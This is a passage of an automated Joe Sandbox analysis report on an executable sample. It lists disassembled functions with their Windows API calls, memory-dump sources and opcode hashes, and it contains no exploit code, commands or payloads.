                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 22f991c7b5ea60d8d27b83e003eb7ac452284132aa267eda052ddad22e59fd22
                                                                            • Instruction ID: bb1142c6f078cdbf3436e4025a5ba86c05667823e26b04d31dcc22a26aa35498
                                                                            • Opcode Fuzzy Hash: 22f991c7b5ea60d8d27b83e003eb7ac452284132aa267eda052ddad22e59fd22
                                                                            • Instruction Fuzzy Hash: BC318871A105248BFB38CA28C899F69B776FBD0309F0482E9D01EAE596C635AD95CF50
                                                                            Function 007C68EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C6932
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C696A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C6987
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C69D7
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C6A95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 5d8cb82c86ae98a4bf5f65ec907d9f8dec5c09bd192879ee2d7ac88ffcc6019f
                                                                            • Instruction ID: 1e887e71bbe4a3bcda22273055f325cd321fcff3b3742750073762cf6daab9d7
                                                                            • Opcode Fuzzy Hash: 5d8cb82c86ae98a4bf5f65ec907d9f8dec5c09bd192879ee2d7ac88ffcc6019f
                                                                            • Instruction Fuzzy Hash: 1E31F071600914EBFB18CF88C6D9A6DBB76FBD0309F1482ACD0176F695C639EA81DB40
                                                                            Function 007DC420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 007DC456
                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007DC470
                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 007DC48C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC499
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                            • API String ID: 173816248-495562761
                                                                            • Opcode ID: b68721796555182cc9bc1485c29e92af5a27c7ab9d9196c27f03d5337080d1c5
                                                                            • Instruction ID: a6762b69fd0394edc5db5ef9e722741ecd4669f21c8066e326377dadcf3fa015
                                                                            • Opcode Fuzzy Hash: b68721796555182cc9bc1485c29e92af5a27c7ab9d9196c27f03d5337080d1c5
                                                                            • Instruction Fuzzy Hash: 4C010071A40309ABEB14CF90DC55FEE7779AB44700F104549FA05AA2C0D7B59604CF65
                                                                            Function 007E7A12 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBCMT ref: 007E7A25
                                                                              • Part of subcall function 007E7980: ___BuildCatchObjectHelper.LIBCMT ref: 007E79B6
                                                                            • _UnwindNestedFrames.LIBCMT ref: 007E7A3C
                                                                            • ___FrameUnwindToState.LIBCMT ref: 007E7A4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                            • String ID: csm$csm
                                                                            • API String ID: 2163707966-3733052814
                                                                            • Opcode ID: 4ef99debcadfdcecb3433f75b9a0fe794b6cec0601b21e23afb445cc8b992cdc
                                                                            • Instruction ID: a227cb93c50539fd17ee354a928bd2b381f3ca37a01c1a54fff8af9c16a06d9f
                                                                            • Opcode Fuzzy Hash: 4ef99debcadfdcecb3433f75b9a0fe794b6cec0601b21e23afb445cc8b992cdc
                                                                            • Instruction Fuzzy Hash: A201E871006189FBDF16AF96CC49EEE7F6AEF08358F108020FD1815162D73A9A61DBA1
                                                                            Function 007E41F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 007E4212
                                                                              • Part of subcall function 007E4619: __FF_MSGBANNER.LIBCMT ref: 007E4632
                                                                              • Part of subcall function 007E4619: __NMSG_WRITE.LIBCMT ref: 007E4639
                                                                              • Part of subcall function 007E4619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,007C5B93,?), ref: 007E465E
                                                                            • std::exception::exception.LIBCMT ref: 007E4247
                                                                            • std::exception::exception.LIBCMT ref: 007E4261
                                                                            • __CxxThrowException@8.LIBCMT ref: 007E4272
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID: Ea}
                                                                            • API String ID: 615853336-3678585182
                                                                            • Opcode ID: 10a7884988dd03ba4faae3aa249ea20ad39ed9584d0ad495fc985d03817bb016
                                                                            • Instruction ID: 1712c705f11c299bed5eacc9d9ec9a02ba3ffa6767fe52c0af6640c32a3f5d32
                                                                            • Opcode Fuzzy Hash: 10a7884988dd03ba4faae3aa249ea20ad39ed9584d0ad495fc985d03817bb016
                                                                            • Instruction Fuzzy Hash: 8AF0F47150228CEACB04EB66EC0B96E37EDBB58318F100415F628A6291EFBC9A00C691
                                                                            Function 007DC1E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007C108E), ref: 007DC1EB
                                                                            • GetProcAddress.KERNEL32(007C108E,IsWow64Process), ref: 007DC204
                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 007DC220
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                            • String ID: IsWow64Process$KERNEL32.DLL
                                                                            • API String ID: 4190356694-1193389583
                                                                            • Opcode ID: c7302a1763b3c0a683f2ec95eba9b2dd774aad0cc0696561cc90c0a072f711b3
                                                                            • Instruction ID: aa2d5237a801441e68e81506000e7f6214494b5776899e717af9586737ce5ce0
                                                                            • Opcode Fuzzy Hash: c7302a1763b3c0a683f2ec95eba9b2dd774aad0cc0696561cc90c0a072f711b3
                                                                            • Instruction Fuzzy Hash: 9FF0A5B5D0520CFBCB14EFE4D949BADBBB8AB08311F108095E905A3341DB785A45DF55
                                                                            Function 007E73B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 007E73D9
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E73EA
                                                                            • __getptd.LIBCMT ref: 007E73F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 803148776-2084237596
                                                                            • Opcode ID: ed8bd0ab92faa1f54095003defd2a49c59da4fdb40cb08683ccfb0fcb8a2e0cc
                                                                            • Instruction ID: b00195dc5e69b3524e157d8e896e2760b2a16a3e59049deea6b075c241025eb2
                                                                            • Opcode Fuzzy Hash: ed8bd0ab92faa1f54095003defd2a49c59da4fdb40cb08683ccfb0fcb8a2e0cc
                                                                            • Instruction Fuzzy Hash: 9AE0123410A2C9CFD7549B66C18A7683695FB4D319F1900A5E40CCB263DB7CD951D543
                                                                            Function 007C9C90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(USER32.DLL,?,?,007C1089), ref: 007C9C9B
                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 007C9CB3
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 007C9CCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: SetProcessDPIAware$USER32.DLL
                                                                            • API String ID: 145871493-772676101
                                                                            • Opcode ID: 918a165b08a5d92ffc616dec2ec63cea0b0fd037df3640153a4e869603431851
                                                                            • Instruction ID: 50bfc5186dd595bc2ccac8a434cb579f7e22b1fea89316041c005d50e5f8b3ee
                                                                            • Opcode Fuzzy Hash: 918a165b08a5d92ffc616dec2ec63cea0b0fd037df3640153a4e869603431851
                                                                            • Instruction Fuzzy Hash: 9BE0C975D0020CEBCB14EFF4D94DAADBBB4AB08301F108198E905A2251DA795B89DB55
                                                                            Function 007D6D6B Relevance: 7.6, APIs: 5, Instructions: 85threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DC7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DF9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6E17
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6E4C
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6E8C
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007D6EF9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F31
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F63
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6F81
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6FB5
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6FF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 738346648-0
                                                                            • Opcode ID: 384dd4f8168bc25edb4eda0113c691ea8c1f636115960df7804ae55b1ef4cfe3
                                                                            • Instruction ID: 2770c415f7bcce571425b8a67487ec6669264f678e7de33bce933e6b83828c20
                                                                            • Opcode Fuzzy Hash: 384dd4f8168bc25edb4eda0113c691ea8c1f636115960df7804ae55b1ef4cfe3
                                                                            • Instruction Fuzzy Hash: CC415A75B002058FCF08CB58C999BBEB7B2FBE4304F558529E156AF2D5DB749841CBA0
                                                                            Function 007E0870 Relevance: 7.6, APIs: 5, Instructions: 69networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSACreateEvent.WS2_32 ref: 007E0876
                                                                            • WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E0939
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                            • String ID:
                                                                            • API String ID: 2166016019-0
                                                                            • Opcode ID: 2b42aff95f3bb0e1b6189b8d71efe679b1340efb6acad2a812a715afd1785087
                                                                            • Instruction ID: add5c602a72133e07326441210e062696a57f847880a515a70a14ff5e059e1c9
                                                                            • Opcode Fuzzy Hash: 2b42aff95f3bb0e1b6189b8d71efe679b1340efb6acad2a812a715afd1785087
                                                                            • Instruction Fuzzy Hash: DC213EB4901309EFDF10CFA5D948BAEB7B5BF49310F104558E90567282C7B9AE81DFA1
                                                                            Function 007E0790 Relevance: 7.6, APIs: 5, Instructions: 69networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSACreateEvent.WS2_32 ref: 007E0796
                                                                            • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E0859
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                            • String ID:
                                                                            • API String ID: 2166016019-0
                                                                            • Opcode ID: 9ad5602e7d45b407dde5475b902a036e79ea0bb2151d8e548ab86ea893522d89
                                                                            • Instruction ID: 3ff0b6fca7f58c96b5554643faffa5a1b4bc0cfe436ce4d46e84c1368b0a57be
                                                                            • Opcode Fuzzy Hash: 9ad5602e7d45b407dde5475b902a036e79ea0bb2151d8e548ab86ea893522d89
                                                                            • Instruction Fuzzy Hash: 8D214AB4901309EFDF10CFA5D948BAEB7B4BF49300F208559E80567281C7B99E80DBE1
                                                                            Function 007EE464 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 007EE472
                                                                              • Part of subcall function 007E4619: __FF_MSGBANNER.LIBCMT ref: 007E4632
                                                                              • Part of subcall function 007E4619: __NMSG_WRITE.LIBCMT ref: 007E4639
                                                                              • Part of subcall function 007E4619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,007C5B93,?), ref: 007E465E
                                                                            • _free.LIBCMT ref: 007EE485
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: 7ede49b8c3d5b0c87a1ce64bce5611abd82f638062a1bc065fdbddbdabb4d221
                                                                            • Instruction ID: 207bb179c0b4ed3886f6f72c52070dfcb06e191954d80acc1ac5972db3a63a7e
                                                                            • Opcode Fuzzy Hash: 7ede49b8c3d5b0c87a1ce64bce5611abd82f638062a1bc065fdbddbdabb4d221
                                                                            • Instruction Fuzzy Hash: 4611AB334076D5EBCB252B77AC0865A3BA9AB4D3A0B208825F94996291DE3C8841C794
                                                                            Function 007E2840 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000018), ref: 007E284A
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 007E287D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E28B8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E28C7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E28D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
